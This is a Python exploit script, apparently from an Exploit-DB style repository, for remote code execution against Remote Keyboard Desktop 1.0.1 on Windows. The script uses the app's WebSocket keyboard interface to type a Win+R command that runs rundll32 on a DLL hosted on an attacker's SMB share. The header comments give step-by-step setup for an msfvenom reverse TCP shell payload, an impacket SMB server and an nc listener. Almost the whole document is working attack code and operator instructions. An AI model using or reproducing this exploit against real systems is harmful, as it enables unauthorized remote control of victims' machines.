6d030b37a6
6 changes to exploits/shellcodes/ghdb Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE) Linux/x86 - Reverse TCP Shellcode (95 bytes) Linux/x86-64 - execve(_/bin/sh_) Shellcode (36 bytes) Windows 11 x64 - Reverse TCP Shellcode (564 bytes)
132 lines
No EOL
3.4 KiB
Python
Executable file
132 lines
No EOL
3.4 KiB
Python
Executable file
# Exploit Title: Remote Keyboard Desktop 1.0.1 - Remote Code Execution (RCE)
|
|
# Date: 05/17/2025
|
|
# Exploit Author: Chokri Hammedi
|
|
# Vendor Homepage: https://remotecontrolio.web.app/
|
|
# Software Link: https://apps.microsoft.com/detail/9n0jw8v5sc9m?hl=neutral&gl=US&ocid=pdpshare
|
|
# Version: 1.0.1
|
|
# Tested on: Windows 10 Pro Build 19045
|
|
|
|
# Start Remote Keyboard Desktop on your windows
|
|
# Preparing:
|
|
#
|
|
# 1. Generating payload (dll/exe):
|
|
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.105 LPORT=8080 -f dll > shell.dll
|
|
# 2. Start smb server: impacket-smbserver SHARE . -smb2support
|
|
# 3. nc -lnvp 8080
|
|
# 4. python exploit.py
|
|
#####
|
|
|
|
#!/usr/bin/env python3
|
|
|
|
import websocket
|
|
import json
|
|
import time
|
|
|
|
target = "192.168.8.105"
|
|
lhost = "192.168.8.101"
|
|
WS_URL = f"ws://{target}:8080/"
|
|
payload = "shell2.dll" # payload dll/exe filename
|
|
debug = False
|
|
|
|
HEADER_LIST = [
|
|
"User-Agent: Dart/3.7 (dart:io)",
|
|
f"Origin: http://{target}:8080",
|
|
"Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits"
|
|
]
|
|
|
|
#SMB_PATH = f"cmd /c \\\\{lhost}\\SHARE\\{payload}" # exe based
|
|
|
|
SMB_PATH = f"rundll32.exe \\\\{lhost}\\SHARE\\{payload},ExportedFunc" # dll
|
|
based
|
|
|
|
special_mapping = {
|
|
' ': ("SPACE", False),
|
|
'/': ("NUMPAD_DIVIDE", False),
|
|
'\\': ("\\", False),
|
|
'.': ("NUMPAD_DECIMAL", False),
|
|
',': (",", False),
|
|
}
|
|
|
|
def send_key_event(ws, key, key_down):
|
|
event = {"command": "keyboard_event", "data": {"key": key, "keyDown":
|
|
key_down, "capsLock": False}}
|
|
ws.send(json.dumps(event))
|
|
|
|
def send_text(ws, text, delay=0.05):
|
|
shift_pressed = False
|
|
for ch in text:
|
|
if ch in special_mapping:
|
|
key_name, need_shift = special_mapping[ch]
|
|
elif ch.isalpha():
|
|
need_shift = ch.isupper()
|
|
key_name = ch.upper()
|
|
elif ch.isdigit():
|
|
key_name = ch
|
|
need_shift = False
|
|
else:
|
|
raise ValueError(f"No key mapping for character: {ch!r}")
|
|
|
|
if need_shift and not shift_pressed:
|
|
send_key_event(ws, "SHIFT", True)
|
|
shift_pressed = True
|
|
elif not need_shift and shift_pressed:
|
|
send_key_event(ws, "SHIFT", False)
|
|
shift_pressed = False
|
|
|
|
send_key_event(ws, key_name, True)
|
|
send_key_event(ws, key_name, False)
|
|
time.sleep(delay)
|
|
|
|
if shift_pressed:
|
|
send_key_event(ws, "SHIFT", False)
|
|
|
|
def send_key(ws, keys, delay=0.05):
|
|
for key in keys:
|
|
send_key_event(ws, key, True)
|
|
time.sleep(delay)
|
|
for key in reversed(keys):
|
|
send_key_event(ws, key, False)
|
|
|
|
def on_open(ws):
|
|
print ("Let's start!")
|
|
|
|
send_key(ws, ["LEFT_WINDOWS", "R"])
|
|
time.sleep(0.5)
|
|
|
|
send_text(ws, SMB_PATH)
|
|
send_key(ws, ["RETURN"])
|
|
print ("Executing...")
|
|
time.sleep(1.2)
|
|
|
|
print("Check your listener!")
|
|
if debug:
|
|
|
|
print("\033[42;37mExploit by blue0x1 - github.com/blue0x1\033[0m
|
|
")
|
|
|
|
ws.close()
|
|
|
|
def on_message(ws, message):
|
|
if debug:
|
|
print("[=] Received:", message)
|
|
|
|
def on_error(ws, error):
|
|
if debug:
|
|
print("[!] Error:", error)
|
|
|
|
def on_close(ws, code, reason):
|
|
if debug:
|
|
print(f"[x] Closed: {code} - {reason}")
|
|
|
|
if __name__ == "__main__":
|
|
websocket.enableTrace(debug)
|
|
ws = websocket.WebSocketApp(
|
|
WS_URL,
|
|
header=HEADER_LIST,
|
|
on_open=on_open,
|
|
on_message=on_message,
|
|
on_error=on_error,
|
|
on_close=on_close
|
|
)
|
|
|
|
ws.run_forever() |